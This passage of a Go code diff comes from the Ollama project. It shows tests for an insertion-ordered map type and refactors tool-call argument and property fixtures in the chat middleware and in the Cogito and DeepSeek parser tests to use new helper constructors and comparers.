for k, v := range m.All() {
|
||||
keys = append(keys, k)
|
||||
values = append(values, v)
|
||||
}
|
||||
|
||||
expectedKeys := []string{"z", "a", "m", "b"}
|
||||
expectedValues := []int{1, 2, 3, 4}
|
||||
|
||||
if !slices.Equal(keys, expectedKeys) {
|
||||
t.Errorf("expected keys %v, got %v", expectedKeys, keys)
|
||||
}
|
||||
if !slices.Equal(values, expectedValues) {
|
||||
t.Errorf("expected values %v, got %v", expectedValues, values)
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_UpdatePreservesPosition(t *testing.T) {
|
||||
m := New[string, int]()
|
||||
|
||||
m.Set("first", 1)
|
||||
m.Set("second", 2)
|
||||
m.Set("third", 3)
|
||||
|
||||
// Update middle element
|
||||
m.Set("second", 20)
|
||||
|
||||
var keys []string
|
||||
for k := range m.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
|
||||
// Order should still be first, second, third
|
||||
expected := []string{"first", "second", "third"}
|
||||
if !slices.Equal(keys, expected) {
|
||||
t.Errorf("expected keys %v, got %v", expected, keys)
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_MarshalJSON_PreservesOrder(t *testing.T) {
|
||||
m := New[string, int]()
|
||||
|
||||
// Insert in non-alphabetical order
|
||||
m.Set("z", 1)
|
||||
m.Set("a", 2)
|
||||
m.Set("m", 3)
|
||||
|
||||
data, err := json.Marshal(m)
|
||||
if err != nil {
|
||||
t.Fatalf("Marshal failed: %v", err)
|
||||
}
|
||||
|
||||
// JSON should preserve insertion order, not alphabetical
|
||||
expected := `{"z":1,"a":2,"m":3}`
|
||||
if string(data) != expected {
|
||||
t.Errorf("expected %s, got %s", expected, string(data))
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_UnmarshalJSON_PreservesOrder(t *testing.T) {
|
||||
// JSON with non-alphabetical key order
|
||||
jsonData := `{"z":1,"a":2,"m":3}`
|
||||
|
||||
m := New[string, int]()
|
||||
if err := json.Unmarshal([]byte(jsonData), m); err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
// Verify iteration order matches JSON order
|
||||
var keys []string
|
||||
for k := range m.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
|
||||
expected := []string{"z", "a", "m"}
|
||||
if !slices.Equal(keys, expected) {
|
||||
t.Errorf("expected keys %v, got %v", expected, keys)
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_JSONRoundTrip(t *testing.T) {
|
||||
// Test that unmarshal -> marshal produces identical JSON
|
||||
original := `{"zebra":"z","apple":"a","mango":"m","banana":"b"}`
|
||||
|
||||
m := New[string, string]()
|
||||
if err := json.Unmarshal([]byte(original), m); err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
data, err := json.Marshal(m)
|
||||
if err != nil {
|
||||
t.Fatalf("Marshal failed: %v", err)
|
||||
}
|
||||
|
||||
if string(data) != original {
|
||||
t.Errorf("round trip failed: expected %s, got %s", original, string(data))
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_ToMap(t *testing.T) {
|
||||
m := New[string, int]()
|
||||
m.Set("a", 1)
|
||||
m.Set("b", 2)
|
||||
|
||||
regular := m.ToMap()
|
||||
|
||||
if len(regular) != 2 {
|
||||
t.Errorf("expected len 2, got %d", len(regular))
|
||||
}
|
||||
if regular["a"] != 1 {
|
||||
t.Errorf("expected regular[a] = 1, got %d", regular["a"])
|
||||
}
|
||||
if regular["b"] != 2 {
|
||||
t.Errorf("expected regular[b] = 2, got %d", regular["b"])
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_NilSafety(t *testing.T) {
|
||||
var m *Map[string, int]
|
||||
|
||||
// All operations should be safe on nil
|
||||
if m.Len() != 0 {
|
||||
t.Errorf("expected Len() = 0 on nil map, got %d", m.Len())
|
||||
}
|
||||
|
||||
v, ok := m.Get("a")
|
||||
if ok {
|
||||
t.Error("expected Get on nil map to return false")
|
||||
}
|
||||
if v != 0 {
|
||||
t.Errorf("expected zero value from nil map, got %d", v)
|
||||
}
|
||||
|
||||
// Set on nil is a no-op
|
||||
m.Set("a", 1)
|
||||
if m.Len() != 0 {
|
||||
t.Errorf("expected Len() = 0 after Set on nil, got %d", m.Len())
|
||||
}
|
||||
|
||||
// All returns empty iterator
|
||||
var keys []string
|
||||
for k := range m.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
if len(keys) != 0 {
|
||||
t.Errorf("expected empty iteration on nil map, got %v", keys)
|
||||
}
|
||||
|
||||
// ToMap returns nil
|
||||
if m.ToMap() != nil {
|
||||
t.Error("expected ToMap to return nil on nil map")
|
||||
}
|
||||
|
||||
// MarshalJSON returns null
|
||||
data, err := json.Marshal(m)
|
||||
if err != nil {
|
||||
t.Fatalf("Marshal failed: %v", err)
|
||||
}
|
||||
if string(data) != "null" {
|
||||
t.Errorf("expected null, got %s", string(data))
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_EmptyMapMarshal(t *testing.T) {
|
||||
m := New[string, int]()
|
||||
|
||||
data, err := json.Marshal(m)
|
||||
if err != nil {
|
||||
t.Fatalf("Marshal failed: %v", err)
|
||||
}
|
||||
if string(data) != "{}" {
|
||||
t.Errorf("expected {}, got %s", string(data))
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_NestedValues(t *testing.T) {
|
||||
m := New[string, any]()
|
||||
m.Set("string", "hello")
|
||||
m.Set("number", 42)
|
||||
m.Set("bool", true)
|
||||
m.Set("nested", map[string]int{"x": 1})
|
||||
|
||||
data, err := json.Marshal(m)
|
||||
if err != nil {
|
||||
t.Fatalf("Marshal failed: %v", err)
|
||||
}
|
||||
|
||||
expected := `{"string":"hello","number":42,"bool":true,"nested":{"x":1}}`
|
||||
if string(data) != expected {
|
||||
t.Errorf("expected %s, got %s", expected, string(data))
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_AllIteratorEarlyExit(t *testing.T) {
|
||||
m := New[string, int]()
|
||||
m.Set("a", 1)
|
||||
m.Set("b", 2)
|
||||
m.Set("c", 3)
|
||||
m.Set("d", 4)
|
||||
|
||||
// Collect only first 2
|
||||
var keys []string
|
||||
for k := range m.All() {
|
||||
keys = append(keys, k)
|
||||
if len(keys) == 2 {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
expected := []string{"a", "b"}
|
||||
if !slices.Equal(keys, expected) {
|
||||
t.Errorf("expected %v, got %v", expected, keys)
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_IntegerKeys(t *testing.T) {
|
||||
m := New[int, string]()
|
||||
m.Set(3, "three")
|
||||
m.Set(1, "one")
|
||||
m.Set(2, "two")
|
||||
|
||||
var keys []int
|
||||
for k := range m.All() {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
|
||||
// Should preserve insertion order, not numerical order
|
||||
expected := []int{3, 1, 2}
|
||||
if !slices.Equal(keys, expected) {
|
||||
t.Errorf("expected %v, got %v", expected, keys)
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_UnmarshalIntoExisting(t *testing.T) {
|
||||
m := New[string, int]()
|
||||
m.Set("existing", 999)
|
||||
|
||||
// Unmarshal should replace contents
|
||||
if err := json.Unmarshal([]byte(`{"new":1}`), m); err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
_, ok := m.Get("existing")
|
||||
if ok {
|
||||
t.Error("existing key should be gone after unmarshal")
|
||||
}
|
||||
|
||||
v, ok := m.Get("new")
|
||||
if !ok || v != 1 {
|
||||
t.Errorf("expected Get(new) = (1, true), got (%d, %v)", v, ok)
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_LargeOrderPreservation(t *testing.T) {
|
||||
m := New[string, int]()
|
||||
|
||||
// Create many keys in specific order
|
||||
keys := make([]string, 100)
|
||||
for i := range 100 {
|
||||
keys[i] = string(rune('a' + (99 - i))) // reverse order: 'd', 'c', 'b', 'a' (extended)
|
||||
if i >= 26 {
|
||||
keys[i] = string(rune('A'+i-26)) + string(rune('a'+i%26))
|
||||
}
|
||||
}
|
||||
|
||||
for i, k := range keys {
|
||||
m.Set(k, i)
|
||||
}
|
||||
|
||||
// Verify order preserved
|
||||
var resultKeys []string
|
||||
for k := range m.All() {
|
||||
resultKeys = append(resultKeys, k)
|
||||
}
|
||||
|
||||
if !slices.Equal(keys, resultKeys) {
|
||||
t.Error("large map should preserve insertion order")
|
||||
}
|
||||
}
|
||||
|
|
@ -19,6 +19,40 @@ import (
|
|||
"github.com/ollama/ollama/openai"
|
||||
)
|
||||
|
||||
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests)
|
||||
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||
props := api.NewToolPropertiesMap()
|
||||
for k, v := range m {
|
||||
props.Set(k, v)
|
||||
}
|
||||
return props
|
||||
}
|
||||
|
||||
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
|
||||
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for k, v := range m {
|
||||
args.Set(k, v)
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
||||
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value
|
||||
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
|
||||
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||
})
|
||||
|
||||
// propsComparer provides cmp options for comparing ToolPropertiesMap by value
|
||||
var propsComparer = cmp.Comparer(func(a, b *api.ToolPropertiesMap) bool {
|
||||
if a == nil && b == nil {
|
||||
return true
|
||||
}
|
||||
if a == nil || b == nil {
|
||||
return false
|
||||
}
|
||||
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||
})
|
||||
|
||||
const (
|
||||
prefix = `data:image/jpeg;base64,`
|
||||
image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
|
||||
|
|
@ -221,10 +255,10 @@ func TestChatMiddleware(t *testing.T) {
|
|||
ID: "id",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_current_weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris, France",
|
||||
"format": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -261,10 +295,10 @@ func TestChatMiddleware(t *testing.T) {
|
|||
ID: "id",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_current_weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris, France",
|
||||
"format": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -300,10 +334,10 @@ func TestChatMiddleware(t *testing.T) {
|
|||
ID: "id",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_current_weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris, France",
|
||||
"format": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -340,10 +374,10 @@ func TestChatMiddleware(t *testing.T) {
|
|||
ID: "id",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_current_weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris, France",
|
||||
"format": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -380,10 +414,10 @@ func TestChatMiddleware(t *testing.T) {
|
|||
ID: "id_abc",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_current_weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris, France",
|
||||
"format": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -426,10 +460,10 @@ func TestChatMiddleware(t *testing.T) {
|
|||
ID: "id",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_current_weather",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris, France",
|
||||
"format": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -494,7 +528,7 @@ func TestChatMiddleware(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"location"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The city and state",
|
||||
|
|
@ -503,7 +537,7 @@ func TestChatMiddleware(t *testing.T) {
|
|||
Type: api.PropertyType{"string"},
|
||||
Enum: []any{"celsius", "fahrenheit"},
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -558,7 +592,7 @@ func TestChatMiddleware(t *testing.T) {
|
|||
}
|
||||
return
|
||||
}
|
||||
if diff := cmp.Diff(&tc.req, capturedRequest); diff != "" {
|
||||
if diff := cmp.Diff(&tc.req, capturedRequest, argsComparer, propsComparer); diff != "" {
|
||||
t.Fatalf("requests did not match: %+v", diff)
|
||||
}
|
||||
if diff := cmp.Diff(tc.err, errResp); diff != "" {
|
||||
|
|
|
|||
|
|
@ -40,9 +40,9 @@ func TestCogitoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -52,9 +52,9 @@ func TestCogitoParser(t *testing.T) {
|
|||
Function: api.ToolFunction{
|
||||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -71,9 +71,9 @@ func TestCogitoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -83,9 +83,9 @@ func TestCogitoParser(t *testing.T) {
|
|||
Function: api.ToolFunction{
|
||||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -103,17 +103,17 @@ func TestCogitoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "London",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -123,9 +123,9 @@ func TestCogitoParser(t *testing.T) {
|
|||
Function: api.ToolFunction{
|
||||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -140,11 +140,11 @@ func TestCogitoParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "process_data",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"items": []any{"item1", "item2"},
|
||||
"config": map[string]any{"enabled": true, "threshold": 0.95},
|
||||
"count": 42.0,
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -238,7 +238,7 @@ This is line 3</think>Final response here.`,
|
|||
t.Errorf("thinking mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(tt.expectedToolCalls, toolCalls); diff != "" {
|
||||
if diff := cmp.Diff(tt.expectedToolCalls, toolCalls, argsComparer); diff != "" {
|
||||
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
@ -277,9 +277,9 @@ func TestCogitoParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "test_tool",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"arg": "value",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
}
|
||||
|
|
@ -292,7 +292,7 @@ func TestCogitoParser_Streaming(t *testing.T) {
|
|||
t.Errorf("expected thinking %q, got %q", expectedThinking, finalThinking.String())
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(expectedToolCalls, finalToolCalls); diff != "" {
|
||||
if diff := cmp.Diff(expectedToolCalls, finalToolCalls, argsComparer); diff != "" {
|
||||
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
}
|
||||
|
|
@ -367,7 +367,7 @@ func TestCogitoParser_StreamingEdgeCases(t *testing.T) {
|
|||
t.Errorf("expected thinking %q, got %q", tt.expectedThinking, finalThinking.String())
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(tt.expectedToolCalls, finalToolCalls); diff != "" {
|
||||
if diff := cmp.Diff(tt.expectedToolCalls, finalToolCalls, argsComparer); diff != "" {
|
||||
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
@ -412,9 +412,9 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
expectError: false,
|
||||
|
|
@ -427,11 +427,11 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "process_data",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"items": []any{"item1", "item2"},
|
||||
"config": map[string]any{"enabled": true},
|
||||
"count": 42.0,
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
expectError: false,
|
||||
|
|
@ -444,7 +444,7 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "no_args_tool",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
expectError: false,
|
||||
|
|
@ -493,9 +493,9 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
expectError: false,
|
||||
|
|
@ -511,10 +511,10 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
"units": "metric",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
expectError: false,
|
||||
|
|
@ -527,13 +527,13 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "complex_tool",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"nested": map[string]any{
|
||||
"deep": map[string]any{
|
||||
"value": 123.0,
|
||||
},
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
expectError: false,
|
||||
|
|
@ -557,7 +557,7 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
|
|||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(tt.expected, result); diff != "" {
|
||||
if diff := cmp.Diff(tt.expected, result, argsComparer); diff != "" {
|
||||
t.Errorf("tool call mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
|
|||
|
|
@ -51,9 +51,9 @@ func TestDeepSeekParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -67,17 +67,17 @@ func TestDeepSeekParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "London",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -97,10 +97,10 @@ func TestDeepSeekParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "process_data",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"items": []interface{}{"item1", "item2"},
|
||||
"config": map[string]interface{}{"enabled": true, "threshold": 0.95},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -115,9 +115,9 @@ func TestDeepSeekParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -162,9 +162,9 @@ func TestDeepSeekParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -191,10 +191,10 @@ func TestDeepSeekParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "search",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"query": "北京天气",
|
||||
"language": "中文",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -220,10 +220,10 @@ func TestDeepSeekParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "execute_command",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"command": "ls && echo \"done\"",
|
||||
"path": "/home/user",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -244,7 +244,7 @@ func TestDeepSeekParser(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "ping",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -276,7 +276,7 @@ func TestDeepSeekParser(t *testing.T) {
|
|||
t.Errorf("Thinking mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(tt.expectedCalls, calls); diff != "" {
|
||||
if diff := cmp.Diff(tt.expectedCalls, calls, argsComparer); diff != "" {
|
||||
t.Errorf("Tool calls mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
@ -313,9 +313,9 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -342,7 +342,7 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "test",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -375,10 +375,10 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "calc",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"x": float64(42),
|
||||
"y": float64(24),
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -414,7 +414,7 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
|
|||
t.Errorf("Thinking mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(tt.expectedCalls, allCalls); diff != "" {
|
||||
if diff := cmp.Diff(tt.expectedCalls, allCalls, argsComparer); diff != "" {
|
||||
t.Errorf("Tool calls mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
@ -469,7 +469,7 @@ func TestDeepSeekParser_Init(t *testing.T) {
|
|||
|
||||
returnedTools := parser.Init(tools, nil, &api.ThinkValue{Value: true})
|
||||
|
||||
if diff := cmp.Diff(tools, returnedTools); diff != "" {
|
||||
if diff := cmp.Diff(tools, returnedTools, toolsComparer); diff != "" {
|
||||
t.Errorf("Init() returned tools mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
|
||||
|
|
@ -492,9 +492,9 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Paris",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -504,10 +504,10 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "process_data",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"items": []interface{}{"a", "b"},
|
||||
"config": map[string]interface{}{"enabled": true},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -517,7 +517,7 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "ping",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -527,9 +527,9 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "获取天气",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"城市": "北京",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -539,10 +539,10 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "execute",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"command": "ls && echo \"done\"",
|
||||
"path": "/home/user",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -552,11 +552,11 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
|
|||
expected: api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "calculate",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"x": 3.14,
|
||||
"y": float64(42),
|
||||
"enabled": true,
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
